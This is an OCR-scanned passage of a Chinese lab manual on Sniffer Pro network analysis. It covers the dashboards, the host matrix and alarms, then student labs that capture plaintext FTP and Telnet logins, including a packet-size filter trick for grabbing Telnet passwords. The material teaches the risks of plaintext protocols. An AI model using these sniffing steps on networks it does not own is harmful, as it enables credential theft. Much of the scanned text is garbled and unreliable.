第 一 个 仪表 显示 的 是 网 络 使 用 率 (utilization) ,第 二 个 仪表 显示 的 是 网 络 每 秒 通过 的 包 
数量 (packets/s) ,第 三 个 仪表 显示 的 是 网 络 每 秒 的 错误 率 (errors/s) 。 

下 面 两 组 数字 中 ,前 面 表 示 当 前 值 , 后 面 表 示 最 大 值 。 通 过 3 个 仪表 可 以 直观 地 观察 到 
网 络 的 使 用 情况 ,仪表 的 红色 区 域 是 警戒 区 域 , 如 果 发 现 有 指针 到 了 红色 区 域 ,就 该 引起 一 
定 的 重视 了 ,说明 网 络 线路 不 好 或 者 网 络 负荷 太 大 。 如 果 需 要 获得 更 详细 的 网 络 整体 使 用 
情况 ,可 以 单 击 【细节 了 按钮 .查看 数据 统计 结果 。 

如 图 3. 2. 33 所 示 ,Drops 表示 网 络 中 遗失 的 数据 包 数 量 ( 在 网 络 活动 高 峰 期 经 常会 遗 
失 数据 包 ) ,过 多 的 广播 会 使 网 络 上 所 有 系统 的 性 能 整体 下 降 。 粒 度 分 布 表 格 中 列 出 了 网 络 
中 数据 包 的 分 布 状 态 ,包括 64B.65 ~ 127B,128~ 255B 等 不 同 字 节 的 数据 包 总 数 。 错 误 描 
述 表 格 中 列 出 了 错误 出 现 率 ,也 就 是 Errors/s。 
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通过 3 个 仪表 盘 ,可 以 很 容易 地 看 到 从 捕获 开始 ,有 多 少数 据 包 经 过 网 络 、 多 少 帧 被 过 
滤 , 以 及 遗失 了 多 少 帧 等 情况 ,还 可 以 看 到 网 络 的 利用 率 数据 包 数 目 和 广播 数 , 如 果 发 现 网 
络 在 每 天 的 特定 时 间 都 会 收 到 大 量 的 组 播 数据 包 ,就 说 明 网 络 可 能 出 现 了 问题 , 需 及 时 分 析 
哪个 应 用 程序 在 发 送 组 播 数据 包 。 

Sniffer 的 很 多 网 络 分 析 结 果 都 可 以 设 定 阀 值 , 若 超出 阔 值 ,报警 记录 就 会 生成 一 条 信 
息 ,并 在 仪表 盘 上 以 红色 标记 阔 值 的 警告 值 。 网 络 管理 员 应 记录 下 警告 信息 ,并且 查 看 系统 
超过 阔 值 多 少 次 ,以 及 超出 阔 值 的 频率 是 多 少 ,这 些 信 息 有 助 于 确定 网 络 是 否 有 问题 。 

单 击 仪表 盘 上 的 【Set Thresholds ( 设 定 阅 值 )] 按 钮 ,打开 Dashboard Properties 对 话 
框 , 即 可 根据 自己 的 网 络 状 况 配 置 仪表 阔 值 ,以 保证 仪表 能 准确 地 显示 网 络 情况 。 

如 图 3. 2. 34 所 示 , 可 以 在 仪表 盘 的 下 方 查 看 网 络 监视 曲线 图 ,主要 包括 网 络 、 错 误 描 述 
和 粒度 分 布 3 种 情况 。 [Long Term】 选 项 每 30min 采样 一 次 ,一 共 可 以 采样 24h;【Short 
Term] 选 项 每 30s 采样 一 次 ,可 以 采样 25min。 
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2. 主机 列表 

单 击 快捷 操作 莱 单 上 的 图 标 昌 ,或 选择 【监视 器 3 莱 单 内 的 【主机 列表 选项 ,界面 中 显 
示 的 是 所 有 在 线 的 本 网 主机 地 址 以 及 外 网 服务 器 地 址 信息 。 可 以 分 别 选择 MAC 地 址 、IP 
地 址 以 及 IPX 地 址 。 通 常情 况 下 ,网 络 中 所 有 终端 的 对 外 数据 交换 行为 ,如 浏览 网 站 、 上 传 下 
载 等 ,都 是 各 终端 与 网 关 在 数据 链 路 层 中 进行 的 ,为 了 分 析 链 路 层 的 数据 交换 行为 ,需要 获取 
MAC 地 址 的 连接 情况 。 通 过 主机 列表 ,可 以 直观 地 看 到 流量 最 大 的 前 10 位 主机 地 址 。 

查看 网 络 主机 信息 时 ,默认 以 MAC 地 址 形式 显示 网 络 中 的 计算 机 。 如 果 计 算 机 处 于 
局 域 网 中 ,可 以 清楚 地 显示 计算 机 的 MAC 地 址 ;但 如 果 计 算 机 处 于 Internet 中 , 则 不 能 获 
得 计算 机 的 MAC 地 址 ,此 时 以 IP 地 址 形式 显示 。 单 击 窗 口 下 方 的 IP 标签 , 即 可 显示 计算 

T E 


T 


机 的 IP 地 址 ,这 样 可 以 更 清楚 地 查看 到 各 台 计 算 机 。 

在 列表 中 可 以 通过 单 击 【广播 或 【多 点 传送 〗 对 广播 量 进 行 统计 。IP 的 广播 有 3 种 : 
5 叫 本 地 广播 ,192. 168. 1. 255 叫 子 网 广播 ,192. 168. 1. 255 叫 全 子 网 广播 。 

为 了 便于 查看 链接 地 址 信息 ,设置 了 【细节 处 饼 状 图 处 柱状 图 等 统计 方式 以 及 [ 单 向 地 
址 查看 下 输出 下 条 件 过 滤 ] 等 多 种 选项 。 在 统计 分 析 的 柱 形 图 与 饼 图 中 ,网 关 流 量 依次 减 
小 。 当 发 现 某 个 网 关 流量 与 其 他 终端 流量 差距 悬殊 时 ,需要 重点 检查 目标 主机 是 否 有 大 网 
络 流量 的 操作 。 如 果 发 现 某 台 计算 机 在 某 个 时 间 段 内 发 送 或 接收 了 大 量 数据 , 则 说 明 其 可 
能 存在 网 络 异 常 。 

当选 中 某 台 主机 时 ,通过 [条件 过 滤 】〗 设 置 过 滤 条 件 ,系统 自 动产 生 一 个 新 的 过 滤器 。 在 流 
量 分 析 过 程 中 ,根据 包 结 构 取 得 主机 信息 , 即 目的 MAC、 源 MAC 或 目的 IPR IP. HITER 
更 详细 的 主机 交互 情况 ,可 以 单 击 列表 中 的 任意 项 ,如 图 3. 2. 35 所 示 , 单 击 IP 地 址 为 114. 80. 


93. 60 的 列表 项 ,可 以 显示 由 114. 80. 93. 60 主机 发 送 或 接收 的 数据 包 情 况 ,如 图 3. 2. 36 所 示 。 
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图 3235 主机 列表 


INET 114.80.93.50 


1400325 


El 32356 单机 连接 情况 


3. 矩阵 

Tat pes Be lE SEHR E A oll, 2X x FEE 8 28 159 3€ I 69 DB PA 1356 3t . n] VJ S zs E 
的 所 有 连接 情况 , 即 主机 会 话 情 况 。 

如 图 3. 2. 37 所 示 ,处 于 活动 状态 的 网 络 连 接 被 标记 为 绿色 ,已 发 生 的 网 络 连 接 被 标记 
为 蓝 色 ,线条 的 粗细 与 流量 的 大 小 成 正比 ,将 鼠标 移动 至 线条 处 ,会 显示 网 络 连接 双方 的 位 
Ti .通信 流量 大 小 以 及 流量 占 当 前 网 络 的 百分比 。 
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。 对 于 LAN, 可 以 分 析 MAC EIP 网 络 层 IP 应 用 层 IPX 网 络 层 和 IPX 传输 层 。 

* 对 于 WAN, 可 以 分 析 链 路 层 、IP 网 络 层 、IP 应 用 层 、IPX 网 络 层 和 IPX 传输 层 。 

矩阵 可 以 说 是 Sniffer 中 最 常用 的 功能 , 它 以 矩阵 方式 列 出 当前 网 络 中 的 连接 情况 ,用 
户 可 以 清楚 地 看 到 某 个 计算 机 正在 与 哪些 地 址 进行 连接 ， 

【通信 量 图 ] 可 以 显示 节点 间 网 络 通信 量 的 全 面 信息 ,而 且 可 以 查看 特定 的 网 络 节点 
信息 。 

【大 纲 】 简 要 汇总 了 每 对 网 络 节点 间 发 送 的 总 字 节 数 和 总 报 文 数 ,可 以 查看 独立 网 络 连 
接 的 数据 包 使 用 情况 ,也 可 以 鼠标 右键 选择 独立 的 IP 终端 节点 ,如 果 连 接 数 目 非 常 大 ,显然 
不 是 一 种 正常 的 业务 连接 ,此 时 需要 认真 检查 每 一 个 连接 的 会 话 情况 。 

如 图 3. 2. 38 所 示 民 细节 可 以 按 高 层 协议 分 类 情况 查看 网 络 连接 及 数据 包 使 用 情况 。 
此 外 .【 柱 状 图 3 以 及 [ 饼 图 都 能 够 实时 显示 网 络 利用 率 在 前 10 位 的 网 络 连接 会 话 。 利 用 和 矩 
阵 监 视 器 可 以 评估 网 络 运 行 状况 和 流量 异常 ,特别 适合 用 来 检测 病毒 。 

对 于 未 知 协议 ,可 以 通过 选择 [工具 了 莱 单 的 [设置 3 选项 下 的 【协议 了 栏 进行 自 定义 ,为 某 
端口 指定 协议 名 称 ,以 便 更 好 地 检测 网 络 流量 。 

通过 和 矩阵 功能 可 以 发 现 网 络 中 使 用 BT 等 P2P 软件 或 中 了 蠕虫 病毒 的 用 户 。 如 果 某 个 
用 户 的 并 发 连接 数 特别 多 ,并且 在 不 断 地 向 其 他 计算 机 发 送 数据 ,就 说 明 该 计算 机 很 可 能 中 
了 蠕虫 等 病毒 。 此 时 ,网络 管 理 员 应 及 时 封 掉 该 计算 机 连接 的 交换 机 端口 ,并 对 该 计算 机 查 
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图 3238 不 同 网 络 协议 的 网 络 连接 情况 


4. 请 求 响应 时 间 

请 求 响应 时 间 (Application Response Time,ART) 用 来 显示 网 络 中 Web 网 站 的 连接 情 
况 , 可 以 看 到 局 域 网 中 有 哪些 计算 机 正在 上 网 ,浏览 的 是 哪些 网 站 等 。 该 窗口 中 显示 了 局 域 
网 内 的 通信 及 数据 传输 大 小 ,并 且 显 示 了 本 地 计算 机 与 Web 网 站 的 IP 地 址 。 通 过 单 击 左 
侧 工 具 栏 中 的 图 标 ,以 柱 形 图 方式 显示 网 络 中 计算 机 的 数据 传输 情况 ,不 同 顺 序 图 注 代 表 右 
侧 列表 中 的 相应 连接 , 柱 形 长 短 表示 传输 量 的 大 小 。 

ART 是 指 一 个 客户 端 发 出 一 个 请 求 , 到 服务 器 响应 回来 的 时 间 差 。 一 般 来 说 ,应 用 响 
应 的 快慢 是 应 用 性 能 的 一 个 重要 指标 。 应 用 性 能 主要 决定 于 网 络 因素 .服务 器 因素 、 客 户 端 
因素 和 应 用 协议 因素 。 

ART 用 来 显示 网 络 中 Web 网 站 的 连接 情况 ,可 以 看 到 局 域 网 中 有 哪些 计算 机 正在 上 
网 ,浏览 的 是 哪些 网 站 等 ,如 图 3.2. 39 所 示 。 该 窗口 中 显示 局 域 网 内 的 通信 及 数据 传输 大 
小 ,以 及 本 地 计算 机 与 Web 网 站 的 IP 地 址 。 通 过 单 击 左 侧 工具 栏 中 的 图 标 , 以 柱状 图 方式 
显示 网 络 中 计算 机 的 数据 传输 情况 ,不 同 的 柱 代 表 右 侧 列表 中 的 相应 连接 , 柱 的 长 短 表示 传 
输 量 的 大 小 。 

如 果 一 个 数据 包 的 目的 了 是 192.168.1.1, 目 的 端口 是 80, 那 么 就 可 以 认定 192. 168. 1. 1 
是 Http 服务 器 地 址 ,而 源 IP 就 是 客户 地 址 ,主要 列表 项 含义 如 下 。 
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图 3239 ART 监 视 功 能 图 


。 AvgRsp: 平均 响应 时 间 。 

。 90%Rsp: 90% 响 应 时 间 , 去 掉头 尾 各 5%。 

。 MinRsp/MaxRsp: 最 小 /最 大 的 响应 时 间 , 以 毫秒 为 单位 。 

。 TotalRsp: 响应 次 数 。 

接 下 来 各 列 为 0 一 25ms 的 响应 次 数 、25 一 50ms 的 响应 次 数 等 。 

通过 单 击 左 侧 的 [属性 项 , 自 定义 所 要 监视 的 网 络 协 议 。 当 协议 不 存在 时 ,可 以 利用 对 
应 端口 号 在 【工具 ] 衣 单 的 [选项] 对 话 框 下 添加 协议 。 

利用 应 用 响应 时 间 的 监视 功能 ,可 以 快速 获得 某 一 业务 的 响应 时 间 。 首 先 获 得 业务 源 
地 址 的 服务 器 /客户 端 响应 时 间 ( 网 络 消耗 时 间 ) 和 服务 器 处 理 时 间 ; 同 时 ,在 业务 的 目的 地 
址 获得 服务 器 处 理 时 间 ,利用 Sniffer 可 以 判断 影响 业务 性 能 的 因素 是 来 自 网 络 ,还 是 来 自 
服务 器 。 通 过 长 期 的 观测 ,还 可 以 设 定 每 一 个 业务 的 响应 基准 线 ,以 此 判断 业务 运行 是 否 
正常 。 

5. 历史 取样 

收集 一 段 时 间 内 的 各 种 网 络 流量 信息 ,通过 这 些 信息 可 以 建立 网 络 运行 状态 基线 ,设置 
网 络 异 常 的 报警 阔 值 。 默 认 情 况 下 ,历史 采样 的 缓冲 有 3600 个 采样 点 ,每 隔 15s 进行 一 次 
采样 ,采样 15h 后 自动 停止 。 如 果 想 延长 采样 时 间 , 可 以 通过 修改 采样 间隔 时 间或 者 设置 组 
冲 区 属性 的 方式 实现 。 具 体 做 法 是 : 单 击 左 侧 的 【属性 了 按钮 ,修改 采样 间隔 ,并 选中 * 当 缓 
冲 区 满 时 覆盖 条件。 此 外 ,还 可 以 灵活 地 选择 多 种 采样 项 目 。 

6. 协议 分 布 

分 析 网 络 中 不 同 协议 的 使 用 情况 。 通 过 协议 分 布 功 能 ,可 以 直观 地 看 到 当前 网 络 流量 
中 协议 的 分 布 情况 ,了 解 各 类 网 络 协议 的 分 布 情况 以 后 ,可 以 找到 网 络 中 流量 最 大 的 主机 ， 
这 意味 着 该 主机 对 网 络 的 影响 也 就 最 大 ,之 后 可 以 利用 主机 列表 的 饼 视 图 功能 找到 流量 最 
大 的 机 器 。 

7. 全 局 统计 表 

全 局 统计 数据 能 够 显示 网 络 的 总 体 活 动情 况 ,并 确认 各 类 数据 包 通信 负载 大 小 ,从 而 分 
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析 网 络 的 总 体 性 能 及 存在 的 问题 。 全 局 统计 表 提 供 了 与 网 络 流量 相关 的 各 类 统计 测量 
方式 。 

。 粒度 分 布 : 根据 数据 包 大 小 与 监测 到 的 通信 总 量 之 比 , 显 示 每 个 数据 包 的 发 生 

频率 。 

。 利 用 率 分 布 : 以 10% 为 基本 度量 单位 ,显示 每 组 空间 内 网 络 带 宽 的 分 布 情况 。 

8. 警报 日 志 

全 面 监测 和 记录 网 络 异 常事 件 。 一 旦 超过 用 户 设 定 的 阔 值 参数 ,警报 器 会 在 警报 日 志 
中 记录 相应 事件 。 警 报 分 为 5 种 不 同 程度 的 严重 性 级 别 : 严重 、 重 要 ,次 要 ,警告 和 通知 。 
对 于 警报 日 志 中 的 每 个 警报 事件 ,可 以 观察 触发 警报 的 具体 节点 类 型 .发生 时 间 、 警 报 级 别 
以 及 描述 信息 等 。 系 统 默 认 的 警报 级 别 见 表 3.2.3. 


表 3.2.3 系统 默认 的 警报 级 别 


= 件 级 s 事 件 级 Fl 
阅 值 超过 上 限 严重 地 址 短 内 的 数据 重复 通知 
IP 地 址 重复 严重 探测 位 置 不 响应 次 要 


选择 [工具 了 莱 单 中 的 选项】, 单 击 [ 警 报 ] 选 项 卡 ,选择 [定义 强度 】, 可 以 修改 警报 强度 ， 
如 图 3.2.40 所 示 。 警 报 可 以 设 定 为 声音 .电子 邮件 、 拨 呼叫 器 以 及 警报 文本 4 类 。 


Lj um 

1 | Threshold: Over upper limit Se 

2 | EP RAM 

5 Ee Or 通知 
一 | 


图 324 警报 级 别 调整 界面 


同时 ,可 以 对 专家 系统 的 实时 分 析 数 据 设 定 警报 级 别 。 选 择 【 工 具 】 下 的 【专家 系统 选 
项 】, 单 击 【警报 】 选 项 卡 , 将 设 定好 严重 性 级 别 的 各 类 系统 层 项 目的 “记录 警报 ”选项 设 定 为 
“是 ”。 在 正常 运行 过 程 中 ,选中 [警报 】 选 项 卡 上 的 “启用 新 警报 " 复 选 框 即 可 。 

实验 报告 要 求 

. 写 明 实验 目的 。 

* 附 上 实验 过 程 的 截图 和 结果 截图 。 

。 阐述 碰 到 的 问题 以 及 解决 方法 。 


” 闸 述 收获 与 体会 。 
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3.3 网 络 分 析 扩 展 实验 


为 了 对 Sniffer Pro 的 使 用 有 一 个 更 加 综合 和 全 面 的 了 解 , 设 计 了 网 络 协议 嗅 探 和 协议 
抓 包 分 析 等 综合 型 实验 。 


3.3.1 网 络 协议 嗅 探 
实验 器 材 


Sniffer Pro 软件 系统 ,1 E. 
PC( Windows XP/Windows 7).1 #7. 


预习 要 求 


CD. 做 好 实验 预习 ,复习 网 络 协议 的 有 关内 容 。 
(2) 复习 Sniffer 软件 的 操作 方法 。 

(3) 熟悉 实验 过 程 和 基本 操作 流程 。 

(4) 做 好 预习 报告 。 


实验 任务 


通过 本 实验 理解 常用 Sniffer 工具 的 配置 方法 ,明确 多 数 相关 协议 的 明文 传输 问题 , 理 
解 TCP/IP 主要 协议 的 报头 结构 ,掌握 TCP/IP 网 络 的 安全 风险 。 


实验 环境 
本 实验 采用 一 个 已 经 连接 并 配置 好 的 局 域 网 环境 。 在 PC 上 安装 Windows 操作 系统 。 
预备 知识 


A) TCP/IP 原理 及 基本 协议 。 
(2) FTP 站 点 搭建 技术 及 基本 协议 。 


实验 步 又 


(1) 开启 Sniffer Pro。 

(2) 捕获 数据 包 前 的 准备 工作 。 

默认 情况 下 ,Sniffer 将 捕获 其 接 入 网 络 中 的 所 有 数据 包 , 但 在 某 些 场 景 下 ,有 些 数据 包 
可 能 不 是 需要 的 ,为 了 快速 定位 网 络 问题 所 在 ,有 必要 对 所 要 捕获 的 数据 包 进行 过 滤 。 可 以 
通过 过 滤器 定义 Sniffer 捕获 数据 包 的 过 滤 规 则 。 过 滤 规 则 包括 网 络 地 址 的 定义 和 几 百 种 
协议 的 定义 。 定 义 过 滤 规 则 的 做 法 如 下 。 

在 主 界面 中 选择 【捕获 了 染 单 中 的 【定义 过 滤器 选项 ,如 图 3. 3. 1 所 示 。 

【地 址 3 选项 卡 是 最 常用 的 过 滤 手 段 ,其 中 包括 MAC 地 址 、IP 地 址 和 IPX 地 址 的 过 滤 
定义 。 以 定义 IP 地 址 过 渡 为 例 ,如 图 3. 3. 2 所 示 。 

PETS 


RE jer | 数据 模式 | 高 级 m | 


图 331 过 滤器 设 定 界 面 


i 


ct RR 


取消 | 配置 文件 
图 332 IP 地 址 过 滤 设 定 界面 


当 需 要 捕获 地 址 为 192. 168. 1. 224 的 主机 与 其 他 主机 数据 通信 时 ,需要 首先 确定 [地址 
类 型 为 IP,【 模 式 ] 为 “包含 ”, 若 选择 “排除 ”, 则 表示 捕获 条 件 为 除 本 主机 以 外 的 所 有 数据 
通信 。 在 下 方 的 位 置 选 项 中 ,在 左右 任意 一 侧 填 写 好 主机 地 址 , 即 192. 168. 1. 224, 在 另 一 
侧 填 写 any, 完 成 通信 地 址 定义 。 
© BeBe eM EMA MEIC Be 
。 加 一 图 表示 由 被 测 主机 发 送 的 数据 包 。 
。 BO Ser heme rein see. 
完成 上 述 设置 后 ,按照 需要 捕获 的 数据 包 类 型 选择 可 用 协议 ,如 HTTP、DNS 等 。 特 别 
需要 注意 的 是 ,DNS、NETBIOS 的 数据 包 有 些 属 于 UDP, 因 此 ,需要 在 UDP 选项 卡 中 进行 
类 似 TCP 选项 卡 的 选择 工作 ,否则 捕获 的 数据 包 将 不 完整 。 
在 【高 级 了 设置 栏目 内 可 以 定义 数据 包 大 小 (68 一 128B) ,缓冲 区 大 小 以 及 文件 存放 位 置 
等 ,具体 内 容 如 图 3. 3. 3 所 示 。 
(3) 捕获 数据 协议 。 
将 定义 好 的 过 滤器 应 用 于 捕获 操作 中 。 启 动 【捕获 功能 ,就 可 以 运用 各 种 网 络 监 控 功 
能 分 析 网 络 数据 流量 及 各 种 数据 包 的 具体 情况 了 。 
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图 333 协议 过 滤 设 定 界面 


实验 报告 要 求 


° 实验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 阅 述 碰 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 


3.3.2 FIP 分 析 
实验 器 材 


Sniffer Pro 软件 系统 ,1 €. 
PC( Windows XP/Windows 7) ,1 £. 


预习 要 求 


(1) 做 好 实验 预习 ,复习 网 络 协议 的 有 关内 容 。 
(2) 复习 Sniffer 软件 的 操作 方法 。 

(3) 熟悉 实验 过 程 和 基本 操作 流程 。 

(4) 做 好 预习 报告 。 


实验 任务 

通过 本 实验 ,掌握 利用 Sniffer 软件 捕获 和 分 析 网 络 协议 的 具体 方法 。 

实验 环境 

本 实验 采用 一 个 已 经 连接 并 配置 好 的 局 域 网 环境 。 在 PC 上 安装 Windows 操作 系统 。 
预备 知识 


(OD FTP 原理 及 基本 协议 。 
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(2) 网 络 协议 分 析 技 术 的 综合 运用 。 
实验 步 又 


按照 实际 需要 ,定义 如 图 3. 3.4 所 示 的 过 滤器 ,并 应 用 该 过 滤器 捕获 FTP 信息 。 运 行 
数据 包 捕 获 功能 。 


摘要 。 | 地址 | 数据 模式 | 高 级 | 组 中 | 为 设置 
m 


mi 
5.223. 124. 124 ---> (Ef 
协议 : IEEESO2.11, TCP, VDP, IPX, OSI 


EIE 


AR. NET 


Emo) 


Lowe 取消 | 配置 文件 
图 334 定义 过 滤器 


在 Sniffer 捕获 状态 下 进行 FTP 站 点 操作 。 如 图 3. 3. 5 Bros ,登录 FTP PA 点 ,位 置信 
息 为 ftp. hrbeu. edu. cn, 用 户 名 和 密码 均 为 匿名 (anonymous)。 看 到 系统 登录 成 功 的 提示 
后 ,用 户 可 以 进行 自 定义 操作 ,对 FTP 站 点 和 — 


f; 


lil C:\Windows\system32\cmd.exe - ftp ftp.hrbeu.edu.cn >ja 


图 335 FIP 命 令 行 登录 界面 


单 击 【 捕 获 停止 ] 或 者 【停止 并 显示 了 按钮 停止 Sniffer 捕获 操作 ,并 把 捕获 的 数据 包 进 行 


解码 和 显示 ,如 图 3. 3. 6 所 示 。 通 过 对 报 文 解析 ,可 以 看 到 Sniffer 捕获 到 了 用 户 登 录 FTP 
的 用 户 名 称 和 明文 密码 ,对 于 用 户 进 行 的 若干 FTP 站 点 操作 行为 ,Sniffer 都 能 捕获 到 相关 
信息 。 


+ 90 。 


= D=21 S=54453 SYN SEO=1179230683 LEN=0 V| 
: D-21 S=54453 ACK=2674058857 WIN=819| 
B ACK=2674058877 


USER anonymous 
ACK-2674058911 


1 S-54453  — ACK-2674058934 0 

C PORT-54453 PORT 125,223.124.124.212| 0:00 

C PORT-54453 LIST 0:00 

D=20 S-54454 SYN ACK-2680643451 SEQ-182| 0:00 

D=20 $-54454 ACK=2680644594 VIN-651| 0:00 

D=21 S=54453 ACK=2674059048 VIN-800| 0:00 

D=20 S=54454 FIN ACK=2680644594 SEQ=182| 0:00 

D=8000 S-4000 ILEN-55 (missing data?) 0:00 

D-49777 S-1900 LEN=479 (missing data?) 0:00 
324 236] D-49772 S-1900 IEN-479 (missing data?) 0:00 ~ 

, 

= 54453 (Dynamic and/or Private) 

TCP: Destination port = 21 (FTP-ctrl) 3 


Sequence number * 1179230700 


7.2. Wh. E 
6 £g L 3 


图 336 FIP 命 令 行 登录 界面 


实验 报告 要 求 


。 写 明 实 验 目 的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
* 阐述 碰 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 


3.3.3 Telnet 协议 分 析 


实验 器 材 


Sniffer Pro 软件 系统 ,1 E. 
PCCWindows XP/Windows 7),1 台 。 


预习 要 求 


CD 做 好 实验 预习 ,复习 网 络 协议 的 有 关内 容 。 
(2) 复习 Sniffer 软件 的 操作 方法 。 

(3) 熟悉 实验 过 程 和 基本 操作 流程 。 

(4) 做 好 预习 报告 。 


实验 任务 
通过 本 实验 ,掌握 利用 Sniffer 软件 捕获 和 分 析 网 络 协议 的 具体 方法 。 
实验 环境 


本 实验 采用 一 个 已 经 连接 并 配置 好 的 局 域 网 环境 。 在 PC 上 安装 Windows 操作 系统 。 


$091 


预备 知识 


(1) Telnet 原理 及 基本 协议 。 
(2) 网 络 协议 分 析 技 术 的 综合 运用 。 


实验 步 又 


按照 实际 需要 ,定义 如 图 3. 3.7 所 示 的 过 滤器 ,并 应 用 该 过 滤器 捕获 Telnet 协议 信息 。 
运行 数据 包 捕 获 功能 。 
[Define Filter ~ Capture aixi 


Sunmary | Address | Data Pattern Advanced | Buffer | 
CE 7 =] | = 


TR surec (cP) 
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CW ] mm^ Profiles. 
图 337 定义 但 NET 协 议 的 过 滤器 


在 应 用 Telnet 方式 登录 远程 计算 机 之 前 ,需要 开启 TELNET 服务 。 如 果 计 算 机 安装 
的 是 Windows 7 操作 系统 , 则 需要 单独 下 载 TELNET. exe 程序 。 登 录 远 程 计 算 机 时 ,需要 
知道 该 计算 机 的 用 户 名 和 密码 

有 关 该 项 目的 测试 ,可 以 选择 在 局 域 网 内 进行 分 组 练习 ,两 人 一 组 ,分 别 Telnet 到 对 方 
计算 机 ,如 图 3. 3.8 和 图 3. 3.9 所 示 。 


ising NTLM authentica 


图 338 远程 登录 界面 


Telnet 192. 168. 1.225 


ttings Adnini 


图 339 远程 连接 成 功 


由 于 telnet 登录 时 口令 部 分 不 回 显 , 只 有 抓 取 从 client 到 server 的 报 文才 能 获取 明文 
口令 ,所 以 一 般 嗅 探 软 件 无 [ 接 看 到 口令 情况 下 ,telnet 登录 时 进入 他 fi ABE 
式 , 而 非 行 输入 模式 ,此 时 基本 上 是 客户 端 一 有 击 键 ,就 立即 向 服务 器 发 送 字符 ,TCP 数据 
-个 字 节 。TCP 数据 区 就 一 个 字 节 , 嗅 探 结果 如 图 3. 3. 10 所 示 。 
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图 3310 嗅 探 结果 


客户 端 telnet 到 服务 端 时 ,一 次 只 传送 一 个 字 节 的 数据 ;由 于 协议 的 头 长 度 是 一 定 的 ， 
所 以 telnet 的 数据 包 大 小 二 “DLC(14B) 十 IP(20B) 十 TCP(20B) 十 数据 (1B)”, 共 55B, 因 
此 ,可 以 将 图 3.3. 7 的 Packet Size 设 为 55, 以 便 捕获 到 用 户 名 和 密码 ;如 图 3. 3. 11 所 示 , 设 
定 为 仅 捕获 客户 端 到 服务 端的 数据 包 , 过 滤 其 他 类 型 的 干扰 数据 包 。 


WD Broadcast/Multicast Address 
D Address Book 


图 3311 设 定 为 仅 捕获 客户 端 到 服务 端的 数据 包 


再 次 重复 捕获 过 程 , 即 可 显示 用 户 名 和 明文 密码 ,如 图 3. 3. 12 所 示 , 用 户 名 为 
administrator, 14 Jj 123456, 


5]|Telnet: C 
Telnet. C 


A332 用 户 名 称 和 明文 密码 


思考 题 
CD 如 何 捕获 HTTP 下 的 用 户 名 和 密码 ? 
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(2) 分 析 TCP 的 头 结构 ,以 及 两 台 主机 之 间 建立 连接 的 过 程 。 
实验 报告 要 求 

。 写 明 实验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 


阐述 碰 到 的 问题 以 及 解决 方法 。 
。 BECK SE. 


3.3.4. 多 协议 综合 实验 
实验 器 材 


Sniffer Pro 软件 系统 ,1 套 。 
PCCWindows XP/Windows 7),1 #7. 


预习 要 求 


(1) 做 好 实验 预习 ,复习 网 络 协议 的 有 关内 容 。 
(2) 复习 Sniffer 软件 的 操作 方法 。 

(3) 熟悉 实验 过 程 和 基本 操作 流程 。 

(4) 做 好 预习 报告 。 


实验 任务 


通过 本 实验 ,理解 和 掌握 Sniffer 的 综合 应 用 ,明确 FTP、TCP、ICMP 等 多 种 协议 的 数 
据 传输 问题 。 理 解 主 要 协议 的 结构 。 


实验 环境 


本 实验 采用 一 个 已 经 连接 并 配置 好 的 局 域 网 环境 。 所 有 的 PC 上 安装 的 都 是 Windows 
操作 系统 。 本 次 实验 需 在 小 组 合作 的 基础 之 上 完成 。 每 个 小 组 由 两 位 成 员 组 成 ,成 员 相 互 
之 间 通 信和 通过 Sniffer 工具 截取 通信 数据 包 , 分 析 数 据 包 完成 实验 内 容 。 


实验 步 又 


CD) 填写 小 组 情况 表 , 通 过 ipconfig 命令 获取 本 机 IP 地 址 ,并 填写 表 3. 3. 1。 
表 3.3.1 小 组 情况 表 


小 组 成 员 姓名 机 器 IP 地 址 本 机 用 户 名 
A 192. 168. 1. 136 User36 
B 192. 168. 1. 137 User37 


(2) 开启 Sniffer Pro 软件 , 自 定义 过 滤器 设置 ,并 进入 捕获 状态 。 
(3) 从 本 机 ping 小 组 另 一 位 成 员 的 计算 机 ,使 用 Sniffer 截取 ping 过 程 中 的 通信 数据 。 
(4) 分 析 由 第 3 步 操作 而 从 本 机 发 送 到 目标 机 器 的 IP 数据 ,并 填写 表 3. 3. 2。 

OR 


3.3.2. IP Sog 
人 P 协 议 版 本 号 (IPv4/IPv6) 


服务 类 型 (“要 求 最 大 吞吐 量 /b”) 


IP 报 文 头 长 度 /bytes 


数据 报 总 长 度 /bytes 


标识 


数据 报 是 否 要 求 分 段 


分 段 偏 移 量 


在 发 送 过 程 中 经 过 几 个 路 由 器 


上 层 协 议 名 称 (ICMP) 
报 文 头 校 验 和 
源 地 址 (IP) 
目标 地 址 (IP) 


(5) 分 析 由 第 3 步 操 作 而 从 目标 机 器 返回 到 本 机 的 数据 帧 中 的 他 数据 报 ,并 填写 表 3. 3. 2。 

(6) 从 本 机 通过 telnet 命令 远程 登录 小 组 另 一 位 成 员 的 计算 机 ,然后 使 用 dir 文件 查看 
对 方 C 盘 根 目录 下 的 文件 系统 结构 ,最 后 使 用 exit 命令 退出 。 使 用 Sniffer 截取 操作 中 的 通 
信 数 据 。 

(7) 分 析 由 第 6 步 操作 而 从 本 机 发 送 到 目标 机 器 的 数据 帧 中 的 TCP 数据 ,并 填写 表 3. 3. 3。 

表 3.3.3 通信 报表 

数据 发 送 端口 号 

通信 目标 端口 号 

TCP 报 文 序号 

TCP 报 文 确认 号 

下 一 个 TCP 报 文 序号 

标志 位 含义 (如 “确认 序号 有 效 ”) 

窗口 大 小 

校 验 和 

源 IP 地 址 

目标 IP 地 址 


(8) 分 析 由 第 6 步 操作 而 从 目标 机 器 返回 到 本 机 的 数据 帧 中 的 TCP 数据 ,并 填写 表 3. 3. 5。 
实验 报告 要 求 


. 写 明 实验 目的 。 
。 附 上 实验 过 程 的 截图 和 结果 截图 。 
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* 阐述 碰 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 


3.3.5 端口 扫描 与 嗅 探 实验 
实验 器 材 


SuperScan 软件 系统 ,1 E, 
Nessus 软件 系统 ,1 E, 
PC(Windows XP/Windows 7),1 台 。 


预习 要 求 


(1) 做 好 实验 预习 ,复习 网 络 协议 的 有 关内 容 。 
(2) 复习 Sniffer 软件 的 操作 方法 。 

(3) 熟悉 实验 过 程 和 基本 操作 流程 。 

(4) 做 好 预习 报告 。 


实验 任务 
